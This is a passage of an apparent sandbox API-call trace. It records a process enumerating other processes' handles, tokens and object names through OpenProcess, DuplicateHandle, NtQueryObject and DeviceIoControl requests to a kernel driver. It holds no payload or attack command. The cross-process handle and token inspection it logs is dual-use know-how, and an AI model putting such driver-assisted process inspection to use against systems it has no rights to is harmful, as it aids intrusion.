PsReleaseProcessExitSynchronization () returned 0x2 [0239.633] ObfDereferenceObject (Object=0xfffffa80026b0b30) returned 0x22 [0239.633] ObQueryNameString (in: Object=0xfffff8a0042b9060, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.633] ObfDereferenceObject (Object=0xfffff8a0042b9060) returned 0x2 [0239.633] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.633] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.633] CloseHandle (hObject=0xc0) returned 1 [0239.633] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x264) returned 0xc0 [0239.634] GetCurrentProcess () returned 0xffffffffffffffff [0239.634] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x78, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.634] CloseHandle (hObject=0xc0) returned 1 [0239.634] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.634] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.634] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.634] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.634] NtQueryInformationProcess (in: ProcessHandle=0xc4, ProcessInformationClass=0x0, ProcessInformation=0x12d538, ProcessInformationLength=0x30, ReturnLength=0x12d4b0 | out: ProcessInformation=0x12d538, ReturnLength=0x12d4b0) returned 0xc0000022 [0239.634] CloseHandle (hObject=0xc4) returned 1 [0239.634] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4e0) returned 0xc4 [0239.634] GetCurrentProcess () returned 0xffffffffffffffff [0239.634] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0239.634] CloseHandle (hObject=0xc4) returned 1 [0239.634] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.634] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.634] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.634] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.634] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea0090 [0239.634] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea0090, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea0090*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0239.634] PsLookupProcessByProcessId (in: ProcessId=0x4e0, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.635] PsAcquireProcessExitSynchronization () returned 0x0 [0239.635] KeStackAttachProcess (in: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020a0490, ApcState=0xfffff880053c85d0) [0239.635] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0239.635] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.635] PsReleaseProcessExitSynchronization () returned 0x2 [0239.635] ObfDereferenceObject (Object=0xfffffa80020a0490) returned 0x1e [0239.635] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa8003072044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003072044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.635] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0239.635] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.635] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea0090 | out: hHeap=0x1b0000) returned 1 [0239.635] CloseHandle (hObject=0xc0) returned 1 [0239.635] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0239.635] GetCurrentProcess () returned 0xffffffffffffffff [0239.635] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.635] CloseHandle (hObject=0xc0) returned 1 [0239.635] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.635] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.635] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.635] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.635] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x3a4) returned 0xc0 [0239.635] GetCurrentProcess () returned 0xffffffffffffffff [0239.635] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0xe0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x8, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0239.636] CloseHandle (hObject=0xc0) returned 1 [0239.636] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0x1, TokenInformation=0x12dbc0, TokenInformationLength=0x800, ReturnLength=0x12d4b4 | out: TokenInformation=0x12dbc0, ReturnLength=0x12d4b4) returned 1 [0239.636] LookupAccountSidW (in: lpSystemName="", Sid=0x12dbd0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12d9b0, cchName=0x12d4bc, ReferencedDomainName=0x12d7a0, cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d4bc, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12d4b8, peUse=0x12d4e8) returned 1 [0239.638] GetTokenInformation (in: TokenHandle=0xc8, TokenInformationClass=0xa, TokenInformation=0x12d568, TokenInformationLength=0x38, ReturnLength=0x12d4b4 | out: TokenInformation=0x12d568, ReturnLength=0x12d4b4) returned 1 [0239.639] GetLastError () returned 0x32 [0239.639] SetLastError (dwErrCode=0x32) [0239.639] GetLastError () returned 0x32 [0239.639] SetLastError (dwErrCode=0x32) [0239.639] CloseHandle (hObject=0xc8) returned 1 [0239.639] CloseHandle (hObject=0xc4) returned 1 [0239.639] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x9f4) returned 0xc4 [0239.639] GetCurrentProcess () returned 0xffffffffffffffff [0239.639] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x1d0, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0239.639] CloseHandle (hObject=0xc4) returned 1 [0239.639] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.639] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.639] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.639] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.639] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.639] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.639] PsLookupProcessByProcessId (in: ProcessId=0x9f4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.640] PsAcquireProcessExitSynchronization () returned 0x0 [0239.640] KeStackAttachProcess (in: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002089b30, ApcState=0xfffff880053c85d0) [0239.640] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a7bd70, HandleInformation=0x0) returned 0x0 [0239.640] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.640] PsReleaseProcessExitSynchronization () returned 0x2 [0239.640] ObfDereferenceObject (Object=0xfffffa8002089b30) returned 0x39 [0239.640] ObQueryNameString (in: Object=0xfffffa8003a7bd70, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.640] ObfDereferenceObject (Object=0xfffffa8003a7bd70) returned 0x2 [0239.640] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.640] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.640] CloseHandle (hObject=0xc8) returned 1 [0239.640] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0239.640] GetCurrentProcess () returned 0xffffffffffffffff [0239.640] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x370, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0239.640] CloseHandle (hObject=0xc8) returned 1 [0239.640] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1ecb50 [0239.640] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ecb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ecb50*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0239.640] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c85a8 | out: Process=0xfffff880053c85a8) returned 0x0 [0239.640] PsAcquireProcessExitSynchronization () returned 0x0 [0239.640] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85c8) [0239.640] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c85b0, HandleInformation=0x0 | out: Object=0xfffff880053c85b0*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0239.641] PsReleaseProcessExitSynchronization () returned 0x2 [0239.641] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0239.641] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880053c85a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880053c85a4) returned 0xc0000004 [0239.641] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a003b2f0d0 [0239.641] ZwQueryObject (in: Handle=0x370, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a003b2f0d0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a003b2f0d0, ReturnLength=0x0) returned 0x0 [0239.641] ExFreePoolWithTag (P=0xfffff8a003b2f0d0, Tag=0x0) [0239.641] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0239.641] KeUnstackDetachProcess (ApcState=0xfffff880053c85c8) [0239.641] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.641] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ecb50 | out: hHeap=0x1b0000) returned 1 [0239.641] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.641] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.641] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.641] PsAcquireProcessExitSynchronization () returned 0x0 [0239.641] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0239.641] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80039b2ef0, HandleInformation=0x0) returned 0x0 [0239.641] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.641] PsReleaseProcessExitSynchronization () returned 0x2 [0239.641] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0239.641] ObQueryNameString (in: Object=0xfffffa80039b2ef0, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.641] ObfDereferenceObject (Object=0xfffffa80039b2ef0) returned 0x2 [0239.641] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.642] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.642] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4bc) returned 0xc8 [0239.642] GetCurrentProcess () returned 0xffffffffffffffff [0239.642] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x150, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0x0) returned 0 [0239.642] CloseHandle (hObject=0xc8) returned 1 [0239.642] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x88) returned 0x1ecb50 [0239.642] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335004c, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ecb50, nOutBufferSize=0x88, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ecb50*, lpBytesReturned=0x12d450*=0x1c, lpOverlapped=0x0) returned 1 [0239.642] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c85a8 | out: Process=0xfffff880053c85a8) returned 0x0 [0239.642] PsAcquireProcessExitSynchronization () returned 0x0 [0239.642] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85c8 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85c8) [0239.642] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c85b0, HandleInformation=0x0 | out: Object=0xfffff880053c85b0*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0239.642] PsReleaseProcessExitSynchronization () returned 0x2 [0239.642] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0239.642] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0xfffff880053c85a4 | out: ObjectInformation=0x0, ReturnLength=0xfffff880053c85a4) returned 0xc0000004 [0239.642] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x80, Tag=0x58637250) returned 0xfffff8a003b2f0d0 [0239.642] ZwQueryObject (in: Handle=0x150, ObjectInformationClass=0x2, ObjectInformation=0xfffff8a003b2f0d0, ObjectInformationLength=0x80, ReturnLength=0x0 | out: ObjectInformation=0xfffff8a003b2f0d0, ReturnLength=0x0) returned 0x0 [0239.642] ExFreePoolWithTag (P=0xfffff8a003b2f0d0, Tag=0x0) [0239.642] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0239.642] KeUnstackDetachProcess (ApcState=0xfffff880053c85c8) [0239.642] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.642] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ecb50 | out: hHeap=0x1b0000) returned 1 [0239.642] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.643] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.643] PsLookupProcessByProcessId (in: ProcessId=0x4bc, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.643] PsAcquireProcessExitSynchronization () returned 0x0 [0239.643] KeStackAttachProcess (in: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80037e1060, ApcState=0xfffff880053c85d0) [0239.643] ObReferenceObjectByHandle (in: Handle=0x150, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a001057e80, HandleInformation=0x0) returned 0x0 [0239.643] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.643] PsReleaseProcessExitSynchronization () returned 0x2 [0239.643] ObfDereferenceObject (Object=0xfffffa80037e1060) returned 0xb8 [0239.643] ObQueryNameString (in: Object=0xfffff8a001057e80, ObjectNameInfo=0xfffffa800307e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.643] ObfDereferenceObject (Object=0xfffff8a001057e80) returned 0x2 [0239.643] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.643] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.643] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x370) returned 0xc8 [0239.643] GetCurrentProcess () returned 0xffffffffffffffff [0239.643] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x9b8, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.643] CloseHandle (hObject=0xc8) returned 1 [0239.643] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.643] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x70) returned 0x1d4c50 [0239.643] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x70, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.643] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.643] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.644] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0239.644] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.644] PsAcquireProcessExitSynchronization () returned 0x0 [0239.644] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff880053c85d0) [0239.644] ObReferenceObjectByHandle (in: Handle=0x9b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80037acce0, HandleInformation=0x0) returned 0x0 [0239.644] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.644] PsReleaseProcessExitSynchronization () returned 0x2 [0239.644] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1dd [0239.644] ObQueryNameString (in: Object=0xfffffa80037acce0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.644] ObfDereferenceObject (Object=0xfffffa80037acce0) returned 0x4 [0239.644] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.644] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.644] CloseHandle (hObject=0xc4) returned 1 [0239.644] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x338) returned 0xc4 [0239.644] GetCurrentProcess () returned 0xffffffffffffffff [0239.644] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc8) returned 1 [0239.644] CloseHandle (hObject=0xc4) returned 1 [0239.644] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.644] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x90) returned 0x1d4820 [0239.644] NtQueryObject (in: Handle=0xc8, ObjectInformationClass=0x2, ObjectInformation=0x1d4820, ObjectInformationLength=0x90, ReturnLength=0x0 | out: ObjectInformation=0x1d4820, ReturnLength=0x0) returned 0x0 [0239.645] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4820 | out: hHeap=0x1b0000) returned 1 [0239.645] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.645] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0239.645] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0239.645] PsAcquireProcessExitSynchronization () returned 0x0 [0239.645] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff880053c85d0) [0239.645] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003674a60, HandleInformation=0x0) returned 0x0 [0239.645] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0239.645] PsReleaseProcessExitSynchronization () returned 0x2 [0239.645] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0239.645] ObQueryNameString (in: Object=0xfffffa8003674a60, ObjectNameInfo=0xfffffa8003080044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003080044, ReturnLength=0xfffff880053c8550) returned 0x0 [0239.645] ObfDereferenceObject (Object=0xfffffa8003674a60) returned 0x2 [0239.645] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0239.645] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0239.645] CloseHandle (hObject=0xc8) returned 1 [0239.645] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc8 [0239.645] GetCurrentProcess () returned 0xffffffffffffffff [0239.645] DuplicateHandle (in: hSourceProcessHandle=0xc8, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0239.645] CloseHandle (hObject=0xc8) returned 1 [0239.645] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0239.646] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x78) returned 0x1d4c50 [0239.646] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x1d4c50, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x1d4c50, ReturnLength=0x0) returned 0x0 [0239.646] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1d4c50 | out: hHeap=0x1b0000) returned 1 [0239.646] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0239.646] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, 